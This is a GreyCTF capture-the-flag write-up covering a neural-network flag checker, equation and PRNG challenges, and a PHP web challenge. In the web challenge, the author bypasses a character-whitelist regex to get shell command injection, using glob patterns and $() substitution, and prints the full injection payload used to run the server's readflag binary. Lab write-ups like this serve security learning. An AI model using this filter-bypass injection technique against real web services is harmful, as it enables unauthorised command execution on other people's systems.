GreyCTF writeups
Logical Computers, Equations, Catino, Shero
Challenges and thoughts
Logical Computers
Blooded this challenge, was nice.
Permutation
Another DLP challenge, third one this week. Relatively simple, so no writeup.
Catino
Probably could have figured out the LLL solution if I used my brain more, luckily we found a sage function to do it for us.
Shero
I’m not a web guy, but this challenge was fun. This is not to say I didn’t lose a few years of my lifespan doing it, but it was fun.
Logical Computers
23 Solves
Teaching computers is like teaching children, you gotta start simple. Today I taught it to recognize the flag!
Setup
We’re given a PyTorch (based) model:
1 | def step_activation(self, x : torch.Tensor) -> torch.Tensor: |
And we’re told that upon inputting the flag, it outputs 1.
1 | in_data = tensorize(flag) |
While not directly stated, we can derive the length of the flag by looking at the shape of the first weight:
1 | model.layer1.weight.shape |
160 bits, indicating a length of 20.
First look
This CTF was run right after SEETF, and so my mind was still primed to one challenge, Neutrality, where I had solved it by “training” the input to an objective. I hence attempted to do the same here.
First, I swapped out the step_activation
definition for a tanh
, which has roughly the same properties, but is continuous, and more importantly, has a useful gradient:
1 | def step_activation(self, x : torch.Tensor) -> torch.Tensor: |
And from there, attempted to train an input to maximise the output (corresponding to the flag). Sadly, this didn’t work. While I didn’t spend too long digging for why (there was still a possible first blood!), I believe that part of the reason is gradient vanishing.
Noting the far off regions of the function. They’re nearly flat, which makes it difficult for gradient based optimisers to work. In the case of this model, it would make sense that the pre-activation values were on some extreme, after all, it makes no difference with the step function, and hence is easier to make.
EDIT 6/12/2022: After looking at it again, I did indeed backprop it successfully! I just interpreted the bits incorrectly (Used the same method as Neutrality
, which is wrong). Not sure how the blood didn’t get sniped, but I’m not complaining.
Looking at the weights and biases
Let’s actually do the challenge now.
Looking at the linear layer’s weights and biases:
1 | model.layer1.weight |
1 | model.layer1.bias |
1 | model.layer2.weight |
1 | model.layer2.bias |
Hidden layer
We can observe something interesting about the second layer’s bias. It’s exactly equal to -(hidden dimention - 1)
. This, together with the fact that the previous layer consists of only $-1$ and $1$, implies that the only way for the neuron to be activated would be for all weight * hidden node
to be 1
, making for $1280 - 1279 = 1$. Hence, the hidden nodes need to match the weights of layer 2, either $1 \cdot 1 = 1$, or $-1 \cdot -1 = 1$. With that in mind, we now know our targets for the hidden nodes.
Input layer
We can do something similar to work our way to the input layer. It’s likely that the weights in layer1
will have something similar going on to the weights in layer2
, and indeed:
1 | model.layer1.weight.sum(axis=1) |
1 | model.layer1.bias |
This time, the weights are $0$ or $1$ only. A weight of $0$ indicates that the neurons are effectively disconnected.
The bias is again -(connected neurons - 1)
, indicating that it’s only activated if all of it’s connected neurons are activated. In other words,
$$
I_0 \land I_1 \land\ …\ \iff H
$$
And importantly, we can reverse the implication: If all hidden neurons that are connected to given input neuron are activated, this particular input neuron must have been activated.
$$
{
\begin{align}
&H_0 \ \land && && I\ \land I_{00}\land\ …\ \land \\
&H_1 \ \land &&\implies && I\ \land I_{10}\land\ …\ \land \implies I\ \land\ (\ \ldots\ ) \\
&H_2 && && I\ \land I_{20}\land\ …
\end{align}
}
$$
In this case, $H$ being activated means its output is $1$. Hence, if we select just the weights that connect to active neurons, and find that there exists a connection from it to an input neuron, this input neuron must be active. If there are no connections between an input neuron to any active hidden neuron, we can be certain that it’s not active.
1 | model.layer1.weight[model.layer2.weight[0] == 0].sum(axis=0) |
$0$s correspond to input neurons with no connections to any active hidden neurons. Hence, we have our input:
1 | 2 * (model.layer1.weight[l2w>0].sum(axis=0)>1) - 1.0 |
Now, we simply need to un-tensorize it into the flag:
1 | def untensorize(x): |
Equation & Equation 2
Equation
Notice that there is a dominant term in both expressions. In the second equation, $m_1^5 \gg 7m_2^3$, so $m_1 \approx \sqrt[5]{168 \ldots}$ and from there, $m2$ is evident.
1 | f1 = 656... |
Equation 2
No comment
Catino
Setup
We’re given a PRNG where the output digits are the fractional parts of a random 2048 bit number’s fourth root. For instance, if the number was 4, then the PRNG would output 41421356...
, since $4^{1/4} = \sqrt2 \approx 1.41421356$.
We can guess the next PRNG output, and each time the server will tell us if we were correct. We need to get 100 correct digits in a row, with a cap at 5000 tries.
Ideas
Let the random number be $r$, fractional part be $f$, and integer part be $n$. We have the following relation:
$$
r = (f+n)^4
$$
Which means $f$ is a root to the polynomial
$$
(x+n)^4 - r =\
x^4 + 4x^3n + 6x^2n^2 + 4xn^3 + n^4 - r
$$
With some* searching, we found sage’s algdep
, which could help find this polynomial. And hence,
1 | nums = "42500023301351455032..." |
Despite this, we found it to be quite finnicky. The first RealField has to be of a similar precision to the decimal from the PRNG, else it would fail. When it fails, often the coefficient of $x^4$ isn’t $1$, hence the assertation.
*2 days
Shero
11 Solves
We like cat, so don’t abuse it please =(
Setup
We have a php script, which runs cat <input>
given that it doesn’t match the regex.
1 |
|
preg_match
We had a few failed first attempts trying to bypass the regex. The first idea is based on the fact that preg_match
sometimes only matches the first line of input. Running a command like
1 | cat a;\ |
Could hence fail to match the second line, bypassing the regex. Unfortunately, we don’t have a ^ ... $
regex here, we had a []
group, which has no such problem.
There was also the possibility that passing a non-string datatype to preg_match
would, instead of raising an error, simply emit a warning and return false
. Then the concatenation with the string would allow the true payload to be run. Sadly, preg_match
does raise an error. It only emits a warning if the pattern is invalid.
The regex
Taking a look at the regex in Regexr,
The regex works by attempting to find a character not found in the given set. If found, it returns 1
, and hence the die
branch is run. Hence, if our string only contains the characters
1 | .cat!? /|-[]()$ |
Then it’s happy to run it.
glob & bash
Apart from cat
, the remaining characters we have to work with are a subset of the glob
characters. For instance, in a directory:
1 | . |
Then the command
1 | cat **/*.txt |
Would output
1 | contents of def.txt |
And the command
1 | cat */abc* |
Would output
1 | contents of xyz/abc.txt |
We can use this to our advantage. There are a few more glob syntaxes that we’ll use later on, but I’ll introduce them as they come along.
Additionally, we have $()
at our disposal, allowing us to use the output of one command as part of another. For example:
1 | echo "It's now $(date)" |
Would evaluate date
, and use its result in echo
:
1 | It's now Sat Jun 11 19:12:44 +08 2022. |
Commands
Running commands on the server
One thing to note is that we can run any command (that matches the regex) we want by doing:
1 | http://challs.nusgreyhats.org:12325/?f=a|cmd |
which is run as
1 | cat a| cmd |
While cat a
fails (due to there being no file a
), the output is piped into cmd
, which thus runs.
Globbing commands
The first thing we might want to do is look around. For this, we’d need to somehow run ls
or dir
. These binaries should be in /bin/
.
On your local system, doing
1 | find /bin -name '???' |
Will show the files matching the pattern ???
. (?
means any character) There are many, so I won’t show it here. Running the glob /bin/???
hence won’t cut it. We need to filter it down more. Let’s start being more specific with our matching using character sets, []
.
If you recall from the regex, []
in essence, means “match a character in this set”. It works the same with glob. The main patterns we’ll be using are:
1 | [abc] # match a, b, or c |
With a little trail and error, we see that
1 | /[a-c]??/[!c]?? |
Matches /bin/dir
, and outputs
1 | /bin/pwd /bin/sed /bin/tar |
Now, if we want, we can dir
any directory! For instance, the root directory:
1 | /[a-c]??/[!c]?? / |
Looks like this:
1 | /: |
readflag & flag.txt
Now, interestingly, there seem to be two important files in the root directory: flag.txt
, and readflag
.
Let’s try to cat flat.txt
. As before, we need to match it with a glob. With the help of /bin/dir
, we can run
1 | /bin/dir /??a?.t?t |
Which only outputs/flag.txt
, indicating that our glob only matches flag.txt
.cat
ing /??a?.t?t
, however, seems to output nothing. Perhaps we don’t have the permissions.
1 | f = / t |
1 | (empty) |
Let’s try again on readflag
(/??a???a?
), and this time, it outputs:
1 | f = / |
1 | ELF>�@`:@8@@@@hh�����-- ���-�=�=px�-�=�=�����DDP�tdT T T <<Q�tdR�td�-�=�=/lib64/ld-linux-x86-64.so.2GNU���X)�EP�7����'��GNU��e�m^ 6/z � "fopenputsprintffget |
Which is an executable! Let’s try to run it:
1 | f = a| /??a???a? |
1 | Password requried! |
Hmm.
With the help of your local rev-er, they can tell you that this executable has the permissions to view flag.txt
, and prints it. However, it only does so if you input the correct password, sRPd45w_0
. You can test this by saving the ELF locally, and running the command
1 | ./readflag sRPd45w_0 |
Which will print the contents of flag.txt
.
Getting characters
Supposing we could find an expression that evaluates to each of the required characters, then getting the flag would be easy. All we need to do is to run
1 | ./readflag $(evals to s)$(evals to R)...$(evals to 0) |
One of the first ideas we had was to cat
out a file’s contents, then extract out the needed characters. We also had another idea that uses a Base64 encoding of characters, but again it would require extraction of needed characters. Let’s first look at that.
Extracting
We quickly figured out that there was a command, cut
, that could help us with extracting chars.
1 | cat def.txt |
Critically, the option -c
uses allowed characters. While -b
works similarly, b
isn’t allowed, and since this is the method in which we’re using to extract arbitrary characters, we can’t use it.
But wait, how do we get 5
? This was yet another road block, but we figured that if we could somehow get the length of an arbitrary string, we’d be set. Sadly, there’s no command length
.
However, we did find a method here:
1 | echo cccc | wc -c |
Which again, luckily uses -c
. Note that it’s one more than the number of c
s, because there’s a hidden newline. We never had to get a 0
character, so this was fine with us. Had we needed to, though, we could have extracted the second character from a number like 100
.
With that, we can continue to the final steps.
Base64
We knew that a command like
1 | echo cta | base64 |
would sometimes output useful characters, such as in this case, R
. Using a direct search of all 3 character sequences containing .cat!?$
, we found that RPd450
were possible through this method, short of sw_
. For reference, the following expression evaluates to R
:
1 | echo cta | base64 | wc -c 3 |
Which then is represented as:
1 | /[a-c]??/[a-t]c[!a]? cta | |
File catting
We still were missing sw_
. We decided to start looking for files that could possibly contain them, which we could then do.
1 | cat file | wc -c N |
After some searching, we found /etc/netconfig
, which contained _
and s
, and /etc/mtab
, which contained w
.
1 | cat /?tc/??tc????? # netconfig |
1 | ... |
If you’re eagle eyed, you might have spotted the w
in the second line. Why didn’t we use it? Well, cut
has a caveat. It’s meant for processing many lines of data, and hence, -c
actually specifies which character to extract on each line. For instance,
1 | cat example |
Which means that the multi-line outputs we found couldn’t be used directly. We worked around this issue by using tail
with the -c
(again) option, which specifies the number of characters to extract from the back. This allowed us to index the last line easily, but nothing else. /etc/netconfig
contains s
and _
on the final line, similar to /etc/mtab
and c
. Putting it all together, this expression evaluates to _
:
1 | cat /etc/netconfig | /usr/etc/tail -c 44 | cut -c 1 |
Which is represented as:
1 | /???/cat /?tc/??tc????? | |
Finale
And with that, we have what we needed. This is the full breakdown of the command:
1 | /readflag sRPd45w_0 |
The expanded,1738 long f
is pasted below.
1 | a| /??a???a? $(/???/cat /?tc/??tc????? | /???/[a-c][c-t]?/ta[c-t]? -c $(/[a-c]??/[a-t]c[!a]? ccccccccccccccccccccccccccccccccccccccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? | /???/[a-c]??/[!c]c -c))$(/[a-c]??/[a-t]c[!a]?%20cta%20|%20/???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]?%20ccc%20|%20/???/[a-c]??/[!c]c%20-c)%20|%20/???/[a-c]??/c?t%20-c%20$(/[a-c]??/[a-t]c[!a]?%20cc%20|%20/???/[a-c]??/[!c]c%20-c))$(/[a-c]??/[a-t]c[!a]? ?ca | /???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? | /???/[a-c]??/[!c]c -c))$(/[a-c]??/[a-t]c[!a]? tca | /???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? | /???/[a-c]??/[!c]c -c))$(/[a-c]??/[a-t]c[!a]? c.$ | /???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? cc | /???/[a-c]??/[!c]c -c))$(/[a-c]??/[a-t]c[!a]? c.a | /???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? cc | /???/[a-c]??/[!c]c -c))$(/???/cat /?tc/???? | /???/[a-c][c-t]?/ta[c-t]? -c $(/[a-c]??/[a-t]c[!a]? cccccccccccccccccccccccccccccccccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? | /???/[a-c]??/[!c]c -c))$(/???/cat /?tc/??tc????? | /???/[a-c][c-t]?/ta[c-t]? -c $(/[a-c]??/[a-t]c[!a]? ccccccccccccccccccccccccccccccccccccccccccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? | /???/[a-c]??/[!c]c -c))$(/[a-c]??/[a-t]c[!a]? cat | /???/[a-c]??/[a-c]a???$(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c) | /???/[a-c]??/c?t -c $(/[a-c]??/[a-t]c[!a]? ccc | /???/[a-c]??/[!c]c -c)) |
Giving it to the server, we get our flag.